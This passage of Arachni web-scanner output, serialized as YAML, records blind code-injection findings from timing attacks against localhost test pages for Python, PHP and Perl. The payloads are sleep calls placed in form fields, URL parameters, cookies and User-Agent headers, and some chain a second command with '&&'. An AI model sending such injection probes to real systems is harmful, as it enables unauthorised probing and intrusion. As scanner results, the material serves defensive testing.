  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: "  import time;time.sleep(8000/1000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: POST
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  import time;time.sleep(__TIME__/1000);"
      :skip_orig: true
      :injected_orig: "  import time;time.sleep(8000/1000);"
      :altered: input
      :element: form
      :params: 
        input: "  import time;time.sleep(8000/1000);"
      :follow_location: true
      :injected: "  import time;time.sleep(8000/1000);"
      :combo: 
        input: "  import time;time.sleep(8000/1000);"
      :action: http://localhost:7470/python/form/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/python/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: link
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/python/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: "  import time;time.sleep(8000/1000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  import time;time.sleep(__TIME__/1000);"
      :skip_orig: true
      :injected_orig: "  import time;time.sleep(8000/1000);"
      :altered: input
      :element: link
      :params: 
        input: "  import time;time.sleep(8000/1000);"
      :follow_location: true
      :injected: "  import time;time.sleep(8000/1000);"
      :combo: 
        input: "  import time;time.sleep(8000/1000);"
      :action: http://localhost:7470/python/link/straight?input=default
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/python/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: cookie
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/python/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=++import+time%3Btime.sleep(8000/1000)%3B
      response: {}

    id: 
    injected: "  import time;time.sleep(8000/1000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  import time;time.sleep(__TIME__/1000);"
      :skip_orig: true
      :injected_orig: "  import time;time.sleep(8000/1000);"
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: "  import time;time.sleep(8000/1000);"
      :injected: "  import time;time.sleep(8000/1000);"
      :combo: 
        cookie: "  import time;time.sleep(8000/1000);"
      :action: http://localhost:7470/python/cookie/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/python/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: header
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/python/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: " &&  import time;time.sleep(8000/1000);"
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: " &&  import time;time.sleep(8000/1000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: " &&  import time;time.sleep(__TIME__/1000);"
      :skip_orig: true
      :injected_orig: " &&  import time;time.sleep(8000/1000);"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: " &&  import time;time.sleep(8000/1000);"
      :injected: " &&  import time;time.sleep(8000/1000);"
      :combo: 
        User-Agent: " &&  import time;time.sleep(8000/1000);"
      :action: http://localhost:7470/python/header/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/python/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: form
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: POST
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/php/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: "  sleep(8000/1000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: POST
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  sleep(__TIME__/1000);"
      :skip_orig: true
      :injected_orig: "  sleep(8000/1000);"
      :altered: input
      :element: form
      :params: 
        input: "  sleep(8000/1000);"
      :follow_location: true
      :injected: "  sleep(8000/1000);"
      :combo: 
        input: "  sleep(8000/1000);"
      :action: http://localhost:7470/php/form/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/php/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: link
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/php/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: "  sleep(8000/1000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  sleep(__TIME__/1000);"
      :skip_orig: true
      :injected_orig: "  sleep(8000/1000);"
      :altered: input
      :element: link
      :params: 
        input: "  sleep(8000/1000);"
      :follow_location: true
      :injected: "  sleep(8000/1000);"
      :combo: 
        input: "  sleep(8000/1000);"
      :action: http://localhost:7470/php/link/straight?input=default
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/php/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: cookie
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/php/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=++sleep(8000/1000)%3B
      response: {}

    id: 
    injected: "  sleep(8000/1000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  sleep(__TIME__/1000);"
      :skip_orig: true
      :injected_orig: "  sleep(8000/1000);"
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: "  sleep(8000/1000);"
      :injected: "  sleep(8000/1000);"
      :combo: 
        cookie: "  sleep(8000/1000);"
      :action: http://localhost:7470/php/cookie/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/php/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: header
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/php/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: " &&  sleep(8000/1000);"
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: " &&  sleep(8000/1000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: " &&  sleep(__TIME__/1000);"
      :skip_orig: true
      :injected_orig: " &&  sleep(8000/1000);"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: " &&  sleep(8000/1000);"
      :injected: " &&  sleep(8000/1000);"
      :combo: 
        User-Agent: " &&  sleep(8000/1000);"
      :action: http://localhost:7470/php/header/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/php/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: form
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: POST
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/perl/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: "  sleep(8000/1000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: POST
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  sleep(__TIME__/1000);"
      :skip_orig: true
      :injected_orig: "  sleep(8000/1000);"
      :altered: input
      :element: form
      :params: 
        input: "  sleep(8000/1000);"
      :follow_location: true
      :injected: "  sleep(8000/1000);"
      :combo: 
        input: "  sleep(8000/1000);"
      :action: http://localhost:7470/perl/form/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/perl/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: link
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/perl/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: "  sleep(8000/1000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  sleep(__TIME__/1000);"
      :skip_orig: true
      :injected_orig: "  sleep(8000/1000);"
      :altered: input
      :element: link
      :params: 
        input: "  sleep(8000/1000);"
      :follow_location: true
      :injected: "  sleep(8000/1000);"
      :combo: 
        input: "  sleep(8000/1000);"
      :action: http://localhost:7470/perl/link/straight?input=default
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/perl/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
